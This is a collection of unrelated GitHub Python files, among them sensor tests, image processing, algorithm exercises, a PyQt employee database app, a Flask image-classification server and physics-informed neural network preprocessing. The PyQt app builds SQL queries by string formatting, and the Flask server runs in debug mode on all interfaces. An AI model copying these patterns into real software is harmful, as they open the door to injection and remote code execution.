list\n","repo_name":"maixiaohai/mydocuments","sub_path":"ip2region_test/getip.py","file_name":"getip.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40351317023","text":"import time\nimport board\nimport microcontroller\nimport busio\nimport adafruit_adxl37x\nimport adafruit_bmp3xx\nimport adafruit_lis331\nimport adafruit_ms8607\n\n# Initialize I2C bus\ni2c = busio.I2C(board.IO9, board.IO8)\n\n# Check for connected I2C devices\nwhile not i2c.try_lock():\n pass\ndevices = i2c.scan()\ni2c.unlock()\n\n# Test each I2C device\nfor device in devices:\n try:\n print()\n print(\"-------------------------------------------------------\")\n print(\"Testing device at address: \", hex(device))\n if device == 0x76:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 P/T sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x40:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 H sensor found!\")\n print(\"Humidity: \", sensor.relative_humidity)\n elif device == 0x77:\n sensor = adafruit_bmp3xx.BMP3XX_I2C(i2c, 0x77)\n print(\"BMP390 sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x1d:\n sensor = adafruit_adxl37x.ADXL375(i2c, 0x1d)\n print(\"ADXL375 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n elif device == 0x19:\n sensor = adafruit_lis331.LIS331HH(i2c, 0x19)\n print(\"LIS331 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n else:\n raise ValueError(\"Unknown device at address: \", hex(device))\n except ValueError as ve:\n print(ve)\n except Exception as e:\n print(\"Error testing device at address \", hex(device), \": \", e)\n\n time.sleep(0.5) # Pause between sensor tests\nprint()\nprint(\"-------------------------------------------------------\")\n","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/Board_Files/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18316962117","text":"# coding: utf-8\n# python3.5.3\n# edge_detecting.py\n\nimport cv2\n\nfrom skimage import data, segmentation\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"--content\", 
type=str)\nparser.add_argument('--output', type=str)\n# blurred staus >>> normal=< 7\nparser.add_argument('--blurred', type=int)\nargs = parser.parse_args()\n\nglobal image, minT, maxT\n\n# Callback function for minimum threshold trackbar.\ndef adjustMinT(v):\n global minT\n minT = v\n cannyEdge()\n\n# Callback function for maximum threshold trackbar.\ndef adjustMaxT(v):\n global maxT\n maxT = v\n cannyEdge()\n\n\n###################################\n# Main program begins here. \n###################################\n\n\n# load original image as grayscale\nimage = cv2.imread(filename=args.content, flags=cv2.IMREAD_GRAYSCALE)\n\n# set up display window with trackbars for minimum and maximum threshold\n# values\n# 추후에 미세값 조정하기 위한 부분으로 현재는 미완료부분임.\ncv2.namedWindow(winname = \"edges\", flags = cv2.WINDOW_NORMAL)\n\nminT = 30\nmaxT = 150\n\n# cv2.createTrackbar() does not support named parameters\ncv2.createTrackbar(\"minT\", \"edges\", minT, 255, adjustMinT)\ncv2.createTrackbar(\"maxT\", \"edges\", maxT, 255, adjustMaxT)\n\n# Smoothing without removing edges.\ngray_filtered = cv2.bilateralFilter(image, 7, 50, 50)\n\n# minT, maxT 값을 밖으로 빼내서 조정값으로 변경해야함. 추후\nedge = cv2.Canny(image=gray_filtered, threshold1=minT, threshold2=maxT)\n\n# subtract 방식이 색상 미세조정이 가능해서 더 성능이 좋아보여, bitwise 를 대기로 함.\n# edge = cv2.bitwise_not(edge)\nedge = cv2.subtract(250, edge)\n\ncv2.imwrite(args.output, edge)","repo_name":"mrsono0/mangoPaint","sub_path":"Effects/edge_detecting.py","file_name":"edge_detecting.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8433504073","text":"from odoo.tests import tagged\n\nfrom odoo.addons.payment_xendit.tests.common import XenditCommon\n\n\n@tagged('post_install', '-at_install')\nclass TestPaymentProvider(XenditCommon):\n def test_incompatible_with_unsupported_currencies(self):\n \"\"\" Test that Xendit providers are filtered out from compatible providers when the currency\n is not supported. \"\"\"\n compatible_providers = self.env['payment.provider']._get_compatible_providers(\n self.company_id, self.partner.id, self.amount, currency_id=self.env.ref('base.AFN').id\n )\n self.assertNotIn(self.xendit, compatible_providers)\n","repo_name":"Vauxoo/odoo","sub_path":"addons/payment_xendit/tests/test_payment_provider.py","file_name":"test_payment_provider.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"12164224651","text":"#Captura de todas las excepciones sin discriminar el tipo.\n\"\"\"\nRealizar la carga de dos números por teclado e imprimir la división del primero respecto al \nsegundo. Capturar cualquier tipo de excepción que se dispare.\n\"\"\"\n\ntry:\n numero1= int(input(\"Ingrese un numero \"))\n numero2= int(input(\"Ingrese un nuevo numero \"))\n division = numero1 / numero2\n print(\"La division de ambos numeros es \", division)\nexcept:\n print(\"Problemas con la entrada de valores o en la operacion\")","repo_name":"SaraEOlivera/Ejercicios-Python","sub_path":"Python Github/Biblioteca - POO/58. Manejo de excepciones.py","file_name":"58. 
Manejo de excepciones.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70115498450","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n \n if t == \"\": return \"\"\n\n countT, countS = {}, {}\n\n for char in t:\n countT[char] = 1 + countT.get(char,0)\n\n res, resLen = (-1,-1), float('inf')\n\n have, need = 0, len(countT)\n\n left = 0\n\n for right in range(len(s)):\n curr = s[right]\n countS[curr] = 1 + countS.get(curr,0)\n\n if curr in countT and countS[curr] == countT[curr]:\n have += 1\n \n while have == need:\n if resLen > (right - left + 1):\n res = (left,right)\n resLen = (right - left + 1)\n \n leftChar = s[left]\n countS[leftChar] -= 1\n\n if leftChar in countT and countS[leftChar] < countT[leftChar]:\n have -= 1\n \n left += 1\n left,right = res\n\n return s[left:right+1] if resLen != float('inf') else \"\"\n\n\n","repo_name":"karan-mudaliar/LeetCode","sub_path":"0076-minimum-window-substring/0076-minimum-window-substring.py","file_name":"0076-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18176428451","text":"# TODO: добавить поиск по имени/фамилии/логину/id добаить комбобокс и поле ввода\n\nimport sqlite3\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QTableWidgetItem, QHeaderView, QMessageBox\n\nimport modules.account\nimport modules.login\nimport modules.search\nimport modules.addDialog\nimport modules.changeDialog\nfrom templates.control_employees import Ui_Control\n\n\nclass Control(QWidget, Ui_Control):\n def __init__(self, login, passwd):\n super().__init__()\n self.setupUi(self)\n self.con = sqlite3.connect('management.db')\n\n self.account = modules.account.Account(login, passwd)\n cur = self.con.cursor()\n self.importance = cur.execute(f\"SELECT importance FROM positions \"\n f\"WHERE position = '{self.account.get_position()}'\").fetchone()[0]\n self.importances = [i[0] for i in cur.execute(\"SELECT importance FROM positions\").fetchall()]\n cur.close()\n\n self.fill_work_table()\n self.config()\n self.fill_filter_cb()\n\n self.newWorkerBtn.clicked.connect(self.add_employee)\n self.setWorkerBtn.clicked.connect(self.update_employee)\n self.deleteWorkerBtn.clicked.connect(self.delete_employee)\n self.filterEdit.textChanged.connect(self.fill_work_table_filter)\n\n def fill_work_table(self):\n sql = \"SELECT * FROM workers\"\n\n cur = self.con.cursor()\n data = cur.execute(sql).fetchall()\n headers = cur.description\n headers = [headers[i][0] for i in range(len(headers))]\n cur.close()\n\n if self.importance != max(self.importances):\n self.outputWorkers.setColumnCount(len(data[0]) - 2)\n else:\n self.outputWorkers.setColumnCount(len(data[0]))\n self.outputWorkers.setHorizontalHeaderLabels(headers)\n header = self.outputWorkers.horizontalHeader()\n header.setSectionResizeMode(0, QHeaderView.Stretch)\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-НАЧАЛО========================\"\"\"\n\n def fill_filter_cb(self):\n if self.importance == max(self.importances):\n self.filterBox.addItems(['Имя', \"Фамилия\", \"Логин\", \"ID\"])\n else:\n self.filterBox.addItems(['Имя', 
\"Фамилия\", \"ID\"])\n\n def fill_work_table_filter(self):\n if not self.filterEdit.text():\n self.fill_work_table()\n result = modules.search.search(self.filterBox.currentText(), self.filterEdit.text())\n if not result:\n return\n data = result[0]\n self.outputWorkers.clear()\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-КОНЕЦ========================\"\"\"\n\n \"\"\"=============НАСТРОЙКА НАЧАЛО============\"\"\"\n def config(self):\n if self.importance == 2:\n self.newWorkerBtn.setEnabled(False)\n self.setWorkerBtn.setEnabled(False)\n self.deleteWorkerBtn.setEnabled(False)\n elif self.importance == max(self.importances):\n import modules.positions\n\n self.tabs.addTab(modules.positions.Positions(), 'Должности')\n else:\n self.setWorkerBtn.setEnabled(False)\n \"\"\"=============НАСТРОЙКА КОНЕЦ============\"\"\"\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ НАЧАЛО============\"\"\"\n\n def add_employee(self):\n dlg = modules.addDialog.AddDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def update_employee(self):\n dlg = modules.changeDialog.ChangeDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def delete_employee(self):\n try:\n elem = self.outputWorkers.selectedItems()[0]\n idd = self.outputWorkers.item(elem.row(), 0).text()\n except IndexError:\n return\n\n cur = self.con.cursor()\n login = cur.execute(f\"SELECT login FROM workers WHERE id = {idd}\").fetchone()[0]\n cur.close()\n\n if login == self.account.get_login():\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить самого себя!')\n return\n\n cur = self.con.cursor()\n elem_importance = cur.execute(\n f\"SELECT importance FROM positions WHERE position = '{self.outputWorkers.item(elem.row(), 6).text()}'\").fetchone()[\n 0]\n cur.close()\n if self.importance < elem_importance:\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить сотрудника, превосходящего вас по должности!')\n return\n\n valid = QMessageBox.question(self, 'Удаление', f\"Действительно удалить сотрудника с id {str(idd)}?\",\n QMessageBox.Yes, QMessageBox.No)\n\n if valid == QMessageBox.Yes:\n cur = self.con.cursor()\n cur.execute(f\"DELETE FROM workers WHERE id IN ({str(idd)})\")\n cur.close()\n self.con.commit()\n self.fill_work_table()\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ КОНЕЦ============\"\"\"\n\n\ndef exception_hook(cls, exception, traceback):\n sys.__excepthook__(cls, exception, traceback)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = modules.login.Login()\n ex.show()\n sys.excepthook = exception_hook\n sys.exit(app.exec_())\n","repo_name":"hatedestiny6/projectYandex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"28218507873","text":"import mahotas\n\nclass ZernikeMoments:\n \n def __init__(self, radius):\n # store the size of the radius that will be used when computing moments\n self.radius = radius\n\n def describe(self, image):\n # return the Zerinke moments for the image\n return mahotas.features.zernike_moments(image, self.radius)\n\n# indexing pokemon 
sprites\n\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nimport cv2\n\n# construct argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--sprites\", required = True,\n help = \"Path where the sprites will be stored\")\nap.add_argument(\"-i\", \"--index\", required = True,\n help = \"Path where the index file will be stored\")\nargs = vars(ap.parse_args())\n\n# intialize our descriptor (Zerinke Moments with a radius of 21\n# used to characterize the shape of our pokemon) and our index dictionary\ndesc = ZernikeMoments(21)\nindex = {}\n\n# loop over the sprite images\nfor spritePath in glob.glob(args[\"sprites\"] + \"/*.png\"):\n \n # parse ot the pokemon name, then load the image and convert to grayscale\n pokemon = spritePath[spritePath.rfind(\"/\") + 1:].replace(\".png\", \"\")\n image = cv2.imread(spritePath)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # pad the image with extra white pixels to ensure the edges of the \n # pokemon are not up against the borders of the image\n image = cv2.copyMakeBorder(image, 15,15,15,15, cv2.BORDER_CONSTANT, value = 255)\n\n # invert + threshold image\n # the inversion takes place so the foreground is white\n thresh = cv2.bitwise_not(image)\n thresh[thresh > 0] = 255\n\n # intialize the outline image, find the outermost\n # contours (outline) of the pokemon, the draw it\n outline = np.zeros(image.shape, dtype = \"uint8\")\n (_, cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[0]\n cv2.drawContours(outline, [cnts],-1,255,-1)\n\n # compute Zernike moments to characterize the shape of pokemon outline\n # the update index\n moments = desc.describe(outline)\n index[pokemon] = moments\n\n# write index to file\nwith open(args[\"index\"], 'wb') as f:\n pickle.dump(index, f)\n\n","repo_name":"AdamBioprinter/OpenCV-Python-Tutorials","sub_path":"opencv/pyimagesearchTuts/Pokedex2.py","file_name":"Pokedex2.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19243559522","text":"from my_city.views import CityNewsViewSet\nfrom rest_framework.routers import SimpleRouter\n\n\nclass OptionalSlashRouter(SimpleRouter):\n\n def __init__(self):\n self.trailing_slash = '/?'\n super(SimpleRouter, self).__init__()\n\n\nrouter = OptionalSlashRouter()\nrouter.register(r'my_city', CityNewsViewSet)\nurlpatterns = router.urls\n","repo_name":"AltynbekPirman/soAktau","sub_path":"backend/src/my_city/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29513116031","text":"# square and multiply modular expoentiation\nfrom traditional_extended_eudlidean import polynomial\nP = polynomial()\n\n\n# suppose p is the characteristic of the field F_p\ndef square_and_multiply(f, g, m, p):\n [_, temp] = P.div(f, g, p)\n result = [1]\n while m != 0:\n m, flag = m / 2, m % 2\n if flag == 1:\n [_, result] = P.div(P.mul(temp, result, p), g, p)\n [_, temp] = P.div(P.mul(temp, temp, p), g, p)\n return result\n","repo_name":"JenTus/AdvancedAlgorithm","sub_path":"square_and_multiply.py","file_name":"square_and_multiply.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"42739851486","text":"\"\"\"Permet de visualiser et d'exploiter\r\nles données générées avec le processus\r\nmarkovien par le code stats_from_markov\"\"\"\r\n# from Code.V2.general import *\r\nfrom general import *\r\nimport numpy as np\r\nfrom pickle import Pickler, Unpickler\r\n\r\n\r\ndef stats_from_markov(\r\n nb_line: int = 1,\r\n nb_column: int = 1,\r\n sample: int = 1_000)\\\r\n -> tuple:\r\n \"\"\"Génère des tas de sable stable aléatoirement.\r\n Revoie la liste de fréquences des tas récurents et non récurents\"\"\"\r\n min_array = None\r\n min_weight = nb_line * nb_column * 3\r\n weight_recurrent = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n collapse_weight = np.zeros(nb_line * nb_column * 18, dtype=np.int64)\r\n loosed_weight = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n\r\n tas = neutral(nb_line, nb_column)\r\n weight = tas.sum()\r\n old_weight = weight\r\n adding_location = 0, 0\r\n for _ in range(sample):\r\n while tas.max() <= 3:\r\n old_weight += 1\r\n adding_location = np.random.randint(0, nb_line), np.random.randint(0, nb_column)\r\n tas[adding_location] += 1\r\n\r\n this_collapse_weight = collapse_large(tas, adding_location[0], adding_location[1]) // 4\r\n\r\n weight = tas.sum()\r\n this_loosed_weight = old_weight - weight\r\n old_weight = weight\r\n\r\n # configuration\r\n weight_recurrent[weight] += 1\r\n if weight < min_weight:\r\n min_weight = weight\r\n min_array = np.copy(tas)\r\n\r\n # collapse weight\r\n if this_collapse_weight > nb_line * nb_column * 18:\r\n raise IndexError(f\"{this_collapse_weight} est l'avalanche de trop\")\r\n else:\r\n collapse_weight[this_collapse_weight] += 1\r\n\r\n # loosed weight\r\n loosed_weight[this_loosed_weight] += 1\r\n\r\n return nb_line, nb_column, sample, weight_recurrent, min_array, collapse_weight, loosed_weight\r\n\r\n\r\ndef save_stats(nb_line, nb_column, sample):\r\n \"\"\"Save the stats\"\"\"\r\n with open(f\"Data\\Markov\\\\markov_{nb_line}_{nb_column}_{sample}\", 'wb') as file:\r\n pic = Pickler(file)\r\n pic.dump(stats_from_markov(nb_line, nb_column, sample))\r\n\r\n\r\nif __name__ == '__main__':\r\n from time import perf_counter as perf\r\n t = perf()\r\n save_stats(70, 70, 10_000_000)\r\n print(perf() - t)\r\n","repo_name":"TheoRudkiewicz/TIPE-Modele-du-tas-de-sable-abelien","sub_path":"Rectangle/Statistiques/stats_from_markov.py","file_name":"stats_from_markov.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"12065840661","text":"from flask import Flask, request, redirect, url_for, flash\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.inception_v3 import *\nfrom tensorflow.keras import backend as K\nfrom werkzeug.utils import secure_filename\n\nimport json\nimport numpy as np\nimport os\n\nUPLOAD_FOLDER = './image_sets/'\nif not os.path.exists(UPLOAD_FOLDER):\n os.mkdir(UPLOAD_FOLDER)\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef InceptV3(img):\n # Load InceptionV3 Image\n model = InceptionV3(include_top=True, weights='imagenet')\n # Resize the image\n img = image.load_img(img, target_size=(299, 299))\n # Change the image to array\n x = image.img_to_array(img)\n # Add dimension to image\n x = np.expand_dims(x, axis=0)\n # Normalize the data between 0 to 1\n x = preprocess_input(x)\n # Get prediciton\n preds = model.predict(x)\n result 
= dict((key, str(value)) for (_,key, value) in decode_predictions(preds)[0])\n K.clear_session()\n return json.dumps(result)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n global model\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n img = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n predict_results = InceptV3(img)\n return predict_results\n return '''\n \n Upload new File\n

    Upload new File

    \n
    \n

    \n \n \n

    \n '''\n\n@app.route('/train',methods = ['GET','POST'])\ndef training():\n if request.method == \"POST\":\n\n return \"This is inceptionV3 return\"\n return '''\n \n Training\n

    Training Custom data

    \n
    \n Bucket Name:
    \n
    \n Bucket Access Key:
    \n
    \n Bucket Secret Key:
    \n
    \n Epoch:
    \n
    \n Batch:
    \n
    \n Learning Rate:
    \n
    \n Decay:
    \n
    \n Momentum:
    \n
    \n \n
    \n '''\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=5001,debug=True,threaded=False)\n","repo_name":"twcc/AI-Services","sub_path":"Tutorial_Three/inceptionv3/inference/flask_web.py","file_name":"flask_web.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"66"} +{"seq_id":"7085289520","text":"import argparse\n\ndef get_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input')\n parser.add_argument('--mapping')\n parser.add_argument('--output')\n args = parser.parse_args()\n\n return args\n\ndef main(args):\n\n mapping = {}\n for line in open(args.mapping):\n src, tgt = line.strip().split()\n mapping[src] = tgt\n \n with open(args.output, 'w') as f:\n for line in open(args.input):\n s = ' '.join([mapping[w] for w in line.strip().split()])\n print(s, file=f)\n \nif __name__ == '__main__':\n\n args = get_args()\n main(args)","repo_name":"bearhsiang/SSLST","sub_path":"utils_new/map_hidden_unit.py","file_name":"map_hidden_unit.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"72258628371","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport re\n\n\nclass Machine:\n def __init__(self, instructions):\n self.instructions = instructions\n self.mask = 'X'\n self.memory = {}\n\n\n def apply_mask(self, value):\n mask = int(self.mask.replace('0', '1').replace('X', '0'), 2)\n overwrite = int(self.mask.replace('X', '0'), 2)\n return (overwrite & mask) | (value & (~mask))\n\n def run(self):\n for instruction in self.instructions:\n m = re.match(r\"mask = ([01X]+)\", instruction)\n if m:\n self.mask = m.group(1)\n continue\n m = re.match(r\"mem\\[(\\d+)\\] = (\\d+)\", instruction)\n if m:\n address = int(m.group(1))\n value = int(m.group(2))\n value_set = self.apply_mask(value)\n self.memory[address] = value_set\n\n\n\ndef main():\n with open(\"input\") as f:\n s = f.read()\n\n machine = Machine(s.splitlines())\n machine.run()\n result = sum(machine.memory.values())\n print(f\"Part 1: {result}\")\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fparat/adventofcode","sub_path":"2020/day14/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11373114483","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pickle import dump\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom torch import from_numpy\nfrom cfdpinn.plots import create_animation\n\ndef preprocess(data,geom,args):\n \"\"\"\n Returns a dict holding the NumPy arrays needed for PINN training\n \"\"\"\n #Merge features x,y,t into single array in data\n data = merge_features(data,geom)\n\n #Seperate into boundary and interior arrays\n data = extract_boundaries(data)\n data = extract_interior(data)\n\n #Obtain feature scaling object\n #Note that scaling is not applied until after training \n #locations are obtained as this requires using \n #pre-scaled spatio-temporal locations\n data[\"scaler\"] = scaling_object(data)\n if args.save_scaler_path != \"\":\n dump(data[\"scaler\"], open(args.save_scaler_path, \"wb\"))\n\n #Create training locations\n data = get_training_locations(data,args)\n\n #Train-test-splitting\n data = apply_scaling(data)\n data = apply_train_test_split(data,args.test_size,scaled=True)\n\n 
#Make boundary arrays contiguous for PyTorch\n data = make_boundary_arrays_contiguous(data)\n\n return data\n\ndef scaling_object(data):\n \"\"\"\n Fit a standard scaler to the training data\n features and return it.\n \"\"\"\n _scaler = StandardScaler()\n scaler = _scaler.fit(data[\"features\"])\n \n return scaler\n\ndef apply_scaling(data):\n \"\"\"\n Apply the data scaler to all training locations\n to be used in PINN training\n \"\"\"\n data_labels = [\"basewall\",\"interior\",\"leftwall\",\"rightwall\"]\n for data_label in data_labels:\n data[f\"scaled_features_{data_label}\"] = \\\n data[\"scaler\"].transform(data[f\"features_{data_label}\"])\n \n return data\n\ndef get_training_locations(data,args):\n \"\"\"\n Store the index of training locations chosen\n by train test split. This allows plotting for\n future visualization.\n \"\"\"\n #First need to apply train_test_splitting to \n #replicate real train_test_split\n data = apply_train_test_split(data,args.test_size,scaled=False)\n\n #Now extract locations for all components of\n #training data arrays\n array_labels = [\"interior\",\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n data[f\"{array_label}_training_locs\"] = np.concatenate(\n (\n data[f\"t_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"y_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"x_{array_label}_train\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n data[f\"{array_label}_training_locs\"] = \\\n data[f\"{array_label}_training_locs\"][data[f\"{array_label}_training_locs\"][:,0].argsort()]\n\n return data\n\ndef apply_train_test_split(data,test_size,scaled):\n \"\"\"\n Apply train-test splitting for all training data\n arrays.\n \"\"\"\n if scaled == True:\n label = \"scaled_\"\n elif scaled == False:\n label = \"\"\n\n #Interior\n (\n data[\"x_interior_train\"],\n data[\"x_interior_test\"],\n data[\"y_interior_train\"],\n data[\"y_interior_test\"],\n data[\"t_interior_train\"],\n data[\"t_interior_test\"],\n data[\"u_interior_train\"],\n data[\"u_interior_test\"],\n data[\"v_interior_train\"],\n data[\"v_interior_test\"],\n data[\"p_interior_train\"],\n data[\"p_interior_test\"],\n ) = train_test_split(\n data[f\"{label}features_interior\"][:,2], \n data[f\"{label}features_interior\"][:,1], \n data[f\"{label}features_interior\"][:,0],\n data[\"u_interior_labels\"],\n data[\"v_interior_labels\"],\n data[\"p_interior_labels\"],\n test_size=test_size)\n\n #Basewall\n (\n data[\"x_basewall_train\"],\n data[\"x_basewall_test\"],\n data[\"y_basewall_train\"],\n data[\"y_basewall_test\"],\n data[\"t_basewall_train\"],\n data[\"t_basewall_test\"],\n data[\"u_basewall_train\"],\n data[\"u_basewall_test\"],\n data[\"v_basewall_train\"],\n data[\"v_basewall_test\"],\n data[\"p_basewall_train\"],\n data[\"p_basewall_test\"],\n ) = train_test_split(\n data[f\"{label}features_basewall\"][:,2], \n data[f\"{label}features_basewall\"][:,1], \n data[f\"{label}features_basewall\"][:,0],\n data[\"u_basewall_labels\"],\n data[\"v_basewall_labels\"],\n data[\"p_basewall_labels\"],\n test_size=test_size)\n\n #Leftwall\n (\n data[\"x_leftwall_train\"],\n data[\"x_leftwall_test\"],\n data[\"y_leftwall_train\"],\n data[\"y_leftwall_test\"],\n data[\"t_leftwall_train\"],\n data[\"t_leftwall_test\"],\n data[\"u_leftwall_train\"],\n data[\"u_leftwall_test\"],\n data[\"v_leftwall_train\"],\n data[\"v_leftwall_test\"],\n data[\"p_leftwall_train\"],\n data[\"p_leftwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_leftwall\"][:,2], \n 
data[f\"{label}features_leftwall\"][:,1], \n data[f\"{label}features_leftwall\"][:,0],\n data[\"u_leftwall_labels\"],\n data[\"v_leftwall_labels\"],\n data[\"p_leftwall_labels\"],\n test_size=test_size)\n\n #Rightwall\n (\n data[\"x_rightwall_train\"],\n data[\"x_rightwall_test\"],\n data[\"y_rightwall_train\"],\n data[\"y_rightwall_test\"],\n data[\"t_rightwall_train\"],\n data[\"t_rightwall_test\"],\n data[\"u_rightwall_train\"],\n data[\"u_rightwall_test\"],\n data[\"v_rightwall_train\"],\n data[\"v_rightwall_test\"],\n data[\"p_rightwall_train\"],\n data[\"p_rightwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_rightwall\"][:,2], \n data[f\"{label}features_rightwall\"][:,1], \n data[f\"{label}features_rightwall\"][:,0],\n data[\"u_rightwall_labels\"],\n data[\"v_rightwall_labels\"],\n data[\"p_rightwall_labels\"],\n test_size=test_size)\n\n return data\n\ndef make_boundary_arrays_contiguous(data):\n \"\"\"\n Concatenate boundary condition arrays into a \n contiguous array to ease training of the PINN\n as all boundary arrays have the same boundary \n condition currently.\n \"\"\"\n data_components = [\"u\",\"v\",\"p\",\"x\",\"y\",\"t\"]\n train_test_components = [\"train\",\"test\"]\n\n for data_component in data_components:\n for train_test_component in train_test_components:\n data[f\"{data_component}_boundary_{train_test_component}\"] = \\\n np.concatenate((\n data[f\"{data_component}_rightwall_{train_test_component}\"],\n data[f\"{data_component}_leftwall_{train_test_component}\"],\n data[f\"{data_component}_basewall_{train_test_component}\"]\n ))\n\n return data\n\ndef extract_boundaries(data):\n \"\"\"\n Extract boundary data from U,V and P arrays\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n \n #Get boundary data labels\n data[f\"{array_label}_basewall\"] = \\\n data[f\"{array_label}\"][:,0,:]\n \n data[f\"{array_label}_leftwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,0]\n \n data[f\"{array_label}_rightwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n data[f\"{array_label}_basewall_labels\"] = \\\n data[f\"{array_label}_basewall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_leftwall_labels\"] = \\\n data[f\"{array_label}_leftwall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_rightwall_labels\"] = \\\n data[f\"{array_label}_rightwall\"].flatten().reshape(-1,1)\n \n #Handling features; 